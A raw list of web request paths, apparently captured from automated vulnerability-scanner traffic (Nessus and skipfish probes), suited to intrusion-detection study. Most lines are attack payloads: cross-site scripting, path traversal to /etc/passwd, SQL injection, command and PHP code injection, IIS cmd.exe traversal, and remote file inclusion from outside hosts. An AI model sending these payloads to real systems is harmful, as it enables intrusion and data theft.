/etc/passwd||\n/cgi-local/cgiemail-1.6/cgicso?query=<script>alert('vulnerable')</script>\n/en-us/dda2qr7j.jsp?<script>cross_site_scripting.nasl</script>\n/weq93ppb.aspx?<script>cross_site_scripting.nasl</script>\n/javascript/phorum.exe\n/b4vng02k.kspx?<script>document.cookie=\"testtrlh=3672;\"</script>\n/fcgi-bin/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/php/mlog.html?screen=/etc/passwd\n/main.php?logout=\"\\x0auname >q86286812 #\n/javascript/document.java\n/?ilang=eng&sid=2\"<script>alert(411825577588);</script>\n/javascript/team.exe\n/cgis/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/edv3mapy.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/examples/servlets/servlet/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\\x00\n/jnv890lt.aspx?<script>cross_site_scripting.nasl</script>\n/cgibin/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/9ko6m4c8.x?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908785&lang_crm=../../vtigerservice.php\\x00\n/manual/servlets/scripts/shoes/shoeform.htm\n/moore's_law/\n/33y9gcqq.mscgi?<script>document.cookie=\"testnvxc=4301;\"</script>\n/ewc3rz1l.php3?<script>document.cookie=\"testkgqo=204;\"</script>\n/javascript/affiliate.exe\n/examples/servlets/servlet/webplus.exe?script=webplus_install_path.nasl\n/examples/jsp/jsp2/el/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/top.php?stuff=\\x0duname >q74771226 #\n/index.php/content/search/?sectionid=3&searchtext=<script>alert(document.cookie)</script>\n/subscriptions.cfm\n/javascript/mp.exe\n/examples/jsp/jsp2/el/man-cgi?section=0&topic=ls;id\n/examples/jsp/cal/edit.jsp?page=user&editor=../../../install\n/main.php?logout=\"&del\\x0bq19661861&rem\\x0b\n/cgi-914/gwweb.exe?help=bad-request\n/8x6w469u.cfc?<script>document.cookie=\"testgfjr=1286;\"</script>\n/phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/main.php?stuff=|ping;-w;9000;-n;1;1.2.3.4|rem;\n/scripts/unlg1.1\n/lsoix5h3.mscgi?<script>cross_site_scripting.nasl</script>\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+555+/tmp/xvvpghsokp0;').\"]=1\n/examples/jsp/error/viewpage.php?file=/etc/passwd\n/examples/jsp/jsp2/jspx/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/en-us/oie504mr.do?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file&currentfolder=/reqtgy.jsp\\x00\n/examples/jsp/jsp2/jspx/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/awstats/awstats.pl?migrate=|echo;/./tmp/lcqujjmwty.sh;echo|awstats344911.txt\n/cgi-915/r.cgi?file=../../../../../../../../../../etc/passwd\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/t578vqea.fts?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/examples/jsp/colors/cart32.exe\n/ttxssh2_218/\n/main.php?stuff=\"ping -w 11000 -n 1 1.2.3.4&rem \n/en-us/oie504mr.nsf?<script>document.cookie=\"testtpby=7052;\"</script>\n/main.php?stuff=\"del\\x09q51339959\\x09#\n/script_path/config.inc.php?_path=http://cirt.net/rfiinc.txt??\n/script/gestion/index.php?path_inc=http://cirt.net/rfiinc.txt?\n/xsqln7eb.nsf?<script>document.cookie=\"testpcbb=9254;\"</script>\n/cacti/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>\n/recordings/workarea/contentdesigner/ekformsiframe.aspx?id=\"><script>alert('nessus')</script>\n/scripts/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd\n/606wkcop.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/?\"><script>alert('struts_sa_surl_xss.nasl')</script>\n/phpmyadmin/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/tukodz3j.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/alibaba.pl|dir ..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,\n/0u75ldxq.asp?<script>cross_site_scripting.nasl</script>\n/um7xpn15.pl?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/en-us/33y9gcqq.jsp?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/main.php?logout='\\x0auname >q64819443 #\n/j734qobz.cfm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/apavxugx.fts?<script>document.cookie=\"testdnbh=5237;\"</script>\n/ao22ww7y.aspx?<script>document.cookie=\"testqppc=8767;\"</script>\n/subscriptionmailsignup/\n/lsoix5h3.asp?<script>cross_site_scripting.nasl</script>\n/init.php?scriptpath=http://192.168.202.118:8080/zz5thkvtmlgl??\n/<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/zv8tv7h8.aspx?<script>document.cookie=\"testcqwz=9752;\"</script>\n/javascript/cs.exe\n/main.php?stuff=\"rm\\x0cq95513284&rem\\x0c\n/w4996nr0.php?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/_vti_bin/fpcount.exe/\n/scripts/cevvxrxqxc_b.shtml\n/main.php?stuff=;del q81835212 #\n/fpnpp5zg.x?<meta http-equiv=set-cookie content=\"testyias=101\">\n/en-us/<script>cross_site_scripting.nasl</script>.cgi\n/n1afe1y6.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-915/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/examples/jsp/error/?mod=read&id=../../../../../../../../../../../../../etc/passwd\\x00\n/en-us/7o5qp766.cfm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/checkbox/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd\n/managesubscriptions/\n/javascript/restore.exe\n/main.php?stuff=&ver >q34994933&rem \n/javascript/messages.exe\n/examples/jsp/error/embed/day.php?path=/etc/passwd\\x00\n/<script>document.cookie=\"testrhbc=8184;\"</script>\n/podtranscript/\n/examples/jsp/num/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/l13b77e5.asp?<script>document.cookie=\"testjvvf=7721;\"</script>\n/scripts/6gl21a1hiz3s.php3\n/source?v=../../../../../../../../../../etc/passwd\\x00\n/9kr0ih0v.cgi?<script>document.cookie=\"testzgnm=1183;\"</script>\n/y8pmygrp.aspx?<script>cross_site_scripting.nasl</script>\n/al_initialize.php?alpath=/etc/passwd\\x00\n/top.php?stuff='\\x0arm\\x09q46955555\\x09#\n/dir_thatware/config.php?root_path=http://192.168.202.96:8080/no4ghqiguzhst?'\n/ny1b3qq4.htm?<script>cross_site_scripting.nasl</script>\n/ht8pn8uq.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/rbec2ohx.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/um7xpn15.exe?<script>document.cookie=\"testotoy=6142;\"</script>\n/top.php?stuff=\"rm,q55729425&rem,\n/examples/jsp/checkbox/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/phpmyadmin/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\\x00|\n/cgi-bin/classes/adodbt/sql.php?classes_dir=/etc/passwd\\x00\n/bl8sefdm.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/w4996nr0.cgi?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/product_descriptions/\n/jw64yq8u.php3?<script>document.cookie=\"testylfu=1313;\"</script>\n/examples/jsp/cal/popup.php?include_path=/etc/passwd\\x00\n/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331905161\n/examples/jsp/jsp2/jspx/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>\n/82q7ywa8.dll?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/top.php?stuff=\"&uname\\x09>q22847462\\x09#\n/top.php?stuff=\"sleep 10 #\n/scripts///admin.html\n/scripts/sc877q2pzqne.asp\n/javascript/jessica.exe\n/javascript/bofh.exe\n/main.php?logout='&rm\\x09q65543975\\x09#\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php&frm_user=&scr_height=&scr_width=q82299952\n/issue_description/\n/main.php?logout=ver\\x0c>q23587427&rem\\x0c\n/examples/jsp/colors/resetpw.php?email=../../../../../../../../../../../../etc/passwd\n/main.php?logout=\"ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/top.php?stuff=\"&ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/scripts/gbadmin.cgi?action=colors\n/index.php?module=<script>foo</script>\n/cyclobenzaprine-description/\n/main.php?stuff=&ver,>q56966143&rem,\n/qhvu0pdg.asp?<script>document.cookie=\"testchuc=2100;\"</script>\n/help.php?q='\\x0auname\\x09>q87897781\\x09#\n/examples/jsp/colors/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd\n/main.php<?eval($_post['q27337311']);?eval($_post['q27337311']);?>\n/en-us/hipkz026.x?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/javascript/notifications.exe\n/scriptingnewsdirectory/\n/mpcgi/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/qhvu0pdg.do?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/guestbook_script/\n/tk21352-scriptlet_tools/\n/scripts/.%2e/..5cwinnt/system32/cmd.exe?/x+/c+copy \\winnt\\system32\\cmd.exe vp56.exe\n/i2n4v4rl.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/rakefile.exe\n/examples/jsp/colors/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/examples/jsp/num/base_qry_common.php?base_path=/etc/passwd\\x00\n/htbin/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/yef5f3d5.aspx?<script>document.cookie=\"testcrcv=6167;\"</script>\n/html/chatheader.php?mainfile=anything&default_theme='<script>alert(document.cookie);</script>\n/phpmyadmin/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd\n/examples/jsp/cal/rss.php?blogid=1&profile=../../config/config.properties.php\\x00\n/weq93ppb.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/women's rights in islam - modernising or outdated/\n/en-us/<script>cross_site_scripting.nasl</script>.htm\n/main.php?stuff=\"del\\xa0q63696925&rem\\xa0\n/wscripts/\n/b5xdqgz2.jsp?<script>cross_site_scripting.nasl</script>\n/u8yiqilu.jspa?<script>document.cookie=\"testswjp=6010;\"</script>\n/thvgjebp.passwd\n/news.php?config[script_path]=@rfiurl?config[script_path]=@rfiurl?\n/scripts/cfide/probe.cfm\n/top.php?stuff=;\n/y8pmygrp.jsp?<script>cross_site_scripting.nasl</script>\n/l13b77e5.jspa?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/htbin/texis.exe/junk\n/<script>alert('vulnerable')</script>.jsp\n/mpcgi/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/_vti_bin/..\\xc0\\xaf../..\\xc0\\xaf../..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/actionscript/\n/u95h6ymu.x?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/recordings/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd\n/scripts/fpadmin.htm\n/main.php?logout=\"ver\\x09>q86373985&rem\\x09\n> hashdum\n/azcrfs8d.pl?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/javascript/iphone.exe\n/ftp/ftp.pl?dir=../../../../../../etc\n/h5sc3gxy.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/606wkcop.dll?<script>cross_site_scripting.nasl</script>\n/ny1b3qq4.idc?<script>cross_site_scripting.nasl</script>\n/apavxugx.asp?<script>document.cookie=\"testdnbh=5237;\"</script>\n/en-us/account/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/ovcgi/openview5.exe\n/cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1\n/javascript/~bin.exe\n/scriptpath/index.php?page=http://192.168.202.96:8080/vir0v3xfc?\n/next week's forecast/\n/m2fpztty.jspa?<script>cross_site_scripting.nasl</script>\n/scripts/qbch5ojumj32.cgi\n/sunshop.index.php?action=storenew&username=<script>alert('vulnerable')</script>\n/scgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/examples/jsp/jsp2/jspx/help.php?section='qualiteam_xcart_sql_xss.nasl\n//./../../../../../../../.windows/win.ini\n/help.php?q=\"rm,q35488415&rem,\n/examples/jsp/sessions/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/cgi-bin/www/delivery/ac.php?bannerid=-1332008323+or+1=1+--+';passthru(base64_decode($_server[http_nessus_xdid48fb]));die;/*\n/examples/servlets/servlet/zml.cgi?file=../../../../../../../../../../../../etc/passwd\\x00\n/zuihld5m.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/exchange/..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/scripts/myevent.php?myevent_path=/etc/passwd\\x00\n/5o9zq43e.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/rv98iwjp.exe?<script>cross_site_scripting.nasl</script>\n/vac1l5vm.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"\\x0asleep 8 #\n/javascript/sponsor.exe\n/examples/jsp/error/index.php?_language=../../../../../../../../../../etc/passwd\\x00\n/iajtej82.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/docs.php?doc=../jpgraph-1.12.1/docs/index\n/fpnpp5zg.cfm?<meta http-equiv=set-cookie content=\"testyias=101\">\n/articles/default.asp?ichannel=duportal_sql_injections2.nasl'&nchannel=articles\n/main.php?stuff=\"del\\xa0q67484693&rem\\xa0\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.kspx\n/scriptlogic-securecopy/\n/profile.asp?handle=foo'\n/en-us/ddoworrl.do?<script>document.cookie=\"testvlau=8517;\"</script>\n/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331909349\n//q59551631&q2217\"q2217<q2217>q59551631\n/examples/jsp/cal/config.php?path[docroot]=/etc/passwd\\x00\n/dda2qr7j.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=5gwkphbixv0nj8yq0\n/help.php?q='&uname\\x09#\n/awstats/awstats.pl?migrate=|echo;echo x;echo|awstats606038.txt\n/javascript/apache.exe\n/en-us/fo564rei.do?<script>cross_site_scripting.nasl</script>\n/scripts/k0pxpjgnimox.sh\n/169okeyj.exe?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/scripts/lom_update.php?etcdir=http://192.168.202.118:8080/ghl9il?\n/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/llumt7msyau5y?\\x00\n/examples/jsp/cal/pals-cgi?palsaction=restart&documentname=/etc/passwd\n/javascript/document.tmp\n/examples/jsp/jsp2/el/index.php?p='nessus\n/javascript/dynamic.exe\n/help.php?q=&ver >q55151681&rem \n/cgi-bin/base_qry_common.php?base_path=/etc/passwd\\x00\n/examples/jsp/cal/js/vendors.php?file=../../../../../../../../../../etc/passwd\\x00nessus.js\n/main.php?logout=\"ping,-w,7000,-n,1,1.2.3.4&rem,\n/lmw4r201.nsf?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/../../windows/dvr2.ini\n/javascript/ecommerce.exe\n/qb2xy9aw.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/uc3w3bdi.php?<script>document.cookie=\"testxllt=9940;\"</script>\n/vjbrrppi.php?<script>cross_site_scripting.nasl</script>\n/82q7ywa8.fts?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/vmi8bb12.idc?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/javascript/corrections.exe\n/scripts/b0j2ijssh6cu.sh\n/applescript-implementors/\n/phpmyadmin/queryframe.php?lang=en-iso-8859-1&server=1&hash=\">='</a><iframe src=javascript:alert(%27xss%27)></iframe>\n/help.php?q=\"uname\\x09>q18952146\\x09#\n/zqqemp6j.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scgi-bin/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/xsqln7eb.dll?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/ny1b3qq4.cfc?<script>cross_site_scripting.nasl</script>\n/scripts/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/floridian\\'s/\n/cialis-prescription/\n/transcription/\n/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini\n/ht8pn8uq.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/virus_descriptions/\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331908853\n/eei78ore.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/ion-p.exe?page=c:\\\\winnt\\\\win.ini\n/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1332010419,4--&blog=1\n/recordings/index.php?gadget=../../../../../../etc/passwd\\x00&path=/etc\n/m2fpztty.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"&ver\\x09>q95679894&rem\\x09\n/women&#39;s-issues/\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1332009307\")</script>\n/cgi-bin/index.php?src=1&_common=1&time=1331904460&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331909312',null,null,null,null --\n/en-us/n9xlumt5.htm?<script>cross_site_scripting.nasl</script>\n/subscriptions.pem\n/noscript/\n/help.php?q=del;q21957336&rem;\n/recordings/sources/functions.php?root_path=/etc/passwd\\x00\n/bytehoard/index.php?infolder=../../../../../../../../../../../etc/\n/top.php?stuff=\"&rm\\x09q25218299&rem\\x09\n/main.php?stuff=\"\\x0duname\\x09>q27469451\\x09#\n/cgi-bin/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--\n/javascript/webb.exe\n/htsearch?exclude=`/etc/passwd`\n/javascript/.passwd.fcgi\n/javascript/.passwd.config\n/user.php?uname=1&module=ns-lostpassword&op=<script>alert(414195590325)</script>\n/t3af3tdz.do?<script>cross_site_scripting.nasl</script>\n/en-us/esmozg5d.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/3j8echh0.x?<script>document.cookie=\"testfuqi=4189;\"</script>\n/examples/jsp/num/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>\n/top.php?stuff='\\x0asleep 8 #\n/q703m78q.x?<script>document.cookie=\"testvowq=604;\"</script>\n/0w155a7c.cfm?<script>cross_site_scripting.nasl</script>\n/esmozg5d.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/.htpasswd.sfish/sfish%nd%nd%nd%nd%nd%nd%nd%nd\n/javascript/cgi-bin.exe\n/d44uk9h2.mscgi?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/examples/jsp/checkbox/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/scgi-bin/ppdscgi.exe\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q16493987&frm_user=&scr_height=&scr_width=\n/examples/jsp/sessions/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl\n/auth2-passwd/\n/scripts/wsisa.dll/wservice=anything?wsmadmin\n/edzaia0i.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/raanw4ia.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/egaet53a.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/wd7crx47eaml.asp\n/htbin/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.cfm\n/catalog.php?action=category_show&id='\n/uvazfs7p.jspa?<script>document.cookie=\"testwtbo=4831;\"</script>\n/xsqln7eb.html?<script>document.cookie=\"testpcbb=9254;\"</script>\n/rbec2ohx.jsp?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435\n/scripts/pajax/pajax_call_dispatcher.php\n/javascript/javax.exe\n/help.php?q=ver\\xa0>q77554152&rem\\xa0\n/en-us/w4996nr0.cfc?<script>document.cookie=\"testttvs=7163;\"</script>\n/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosconfig_absolute_path=http://192.168.202.96:8080/4dckqcc0acprbz?\n/help.php?q=\"ver\\x0b>q14893241&rem\\x0b\n/5qnlm5z2.exe?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/fcgi-bin/htimage.exe/path/filename?2,2\n/top.php?stuff=\"&del q19468613&rem \n/manager/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd\n/b1q8bywu.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/alerts.exe\n/examples/jsp/jsp2/jspx/cgiforum.pl?thesection=../../../../../../../../etc/passwd\\x00\n/examples/jsp/num/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd\n/static//........................................................................../../../../../../../../windows/win.ini\n/cgi-sys/cgi-test.exe\n/javascript/null.exe\n/index.php?op=default&date=200607' union select 1,262566063,1,1,1,1,1,1,1,1--&blogid=1\n/pma/export.php?what=../../../../../../../../../../../../etc/passwd\\x00\n/7uz3ok60.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/img.pl?f=../etc/passwd\n/6n7aacgg.idc?<script>cross_site_scripting.nasl</script>\n/0qhcnefz.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cactimultihtml.pl?multi=/etc/passwd\\x00html\n/tim_o'reilly/\n/help.php?q=\"del\\x09q14739543&rem\\x09\n/way-board/way-board.cgi?db=/etc/passwd\\x00\n/main.php?logout=\"&ping;-w;7000;-n;1;4.3.2.1&rem;\n/album/?mode=album&album=../../../../../../../../etc&dispsize=640&start=0\n/rpxyx07v.jspa?<script>document.cookie=\"testbnli=1975;\"</script>\n/scripts/js/scripts.php?load=/boot.ini\\x00\n/0qhcnefz.cfm?<script>cross_site_scripting.nasl</script>\n/7dbjwpw6.html?<script>cross_site_scripting.nasl</script>\n/6dlc2zm9.php?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/rpc/..%5c..%5cwinnt/system32/cmd.exe?/c+dir\n/en-us/33y9gcqq.exe?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php%3fstuff%3d1583574484&frm_user=&scr_height=q58924236&scr_width=\n/examples/servlets/servlet/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\\x00\n/javascript/200.exe\n/javascript/bulk.exe\n/3j8echh0.cgi?<script>document.cookie=\"testfuqi=4189;\"</script>\n/cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd\n/yef5f3d5.mscgi?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1\\x0acat /etc/passwd\n/j734qobz.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/faq.php?action=&type=view&s=&id=-1' union select 0,478772920,0,0,0,0,0--\n/young's_modulus/\n/en-us/h5sc3gxy.exe?<script>cross_site_scripting.nasl</script>\n/cgi-bin/input2.bat?|dir ..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\\n/examples/jsp/sessions/starnet/addons/slideshow_full.php?album_name='257169990\n/subscription_mag1/\n/awstats/awstats.pl?migrate=|echo;echo x;echo|awstats557139.txt\n/<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/javascript/conference.exe\n/manager/review.php?id=1&cat=&subcat=\"><script>alert('phpmydirectory_multiple_xss.nasl');</script>\n/recordings/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/fphgokkkuu.sh+>+/dev/null+&'); function v\n/hjdzm96v.php?<script>document.cookie=\"testbyqe=7474;\"</script>\n/scripts/login.php?course=\"><script>alert(atutor_xss.nasl)</script>\n/ghswfouu.cfm?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/rpxyx07v.aspx?<script>document.cookie=\"testbnli=1975;\"</script>\n/examples/jsp/jsp2/el/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\\x00\n/whysubscriptions/\n/m5103snj.dll?<script>cross_site_scripting.nasl</script>\n/igtf0zon.dll?<script>cross_site_scripting.nasl</script>\n/manager/store.cgi?startid=../../../../../../../../../etc/passwd\\x00.html\n/uc3w3bdi.mscgi?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/examples/jsp/checkbox/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\\x00\n/cgi-sys/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/help.php?q=\"sleep\\x099\\x09#\n/citizen's guide to animal control/\n/main.php?logout=1 '\" -- \n/scs86g1p.idc?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/ydexw8by.mscgi?<script>document.cookie=\"testulex=4996;\"</script>\n/scripts/samples/details.idc\n/m4kkjf8l.nsf?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331919010','5'--\n/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331905098')</script>\n/examples/jsp/sessions/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/examples/jsp/jsp2/jspx/sources/functions.php?root_path=/etc/passwd\\x00\n/odzk29aa.php3?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/admin/addentry.php?phpbb_root_path=/etc/passwd\\x00\n/cgi-home/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/l4fz1dqw.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/vwmg565s.php3?<script>cross_site_scripting.nasl</script>\n/?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/top.php?stuff=&ver\\xa0>q39815136&rem\\xa0\n/javascript/templates.exe\n/pbserver/..\\xc0\\xaf../..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir\n/examples/jsp/num/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\\x00\n/javascript/mailer.exe\n/en-us/account/index.php?_language=../../../../../../../../../../etc/passwd\\x00\n/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904238,927121236 -- 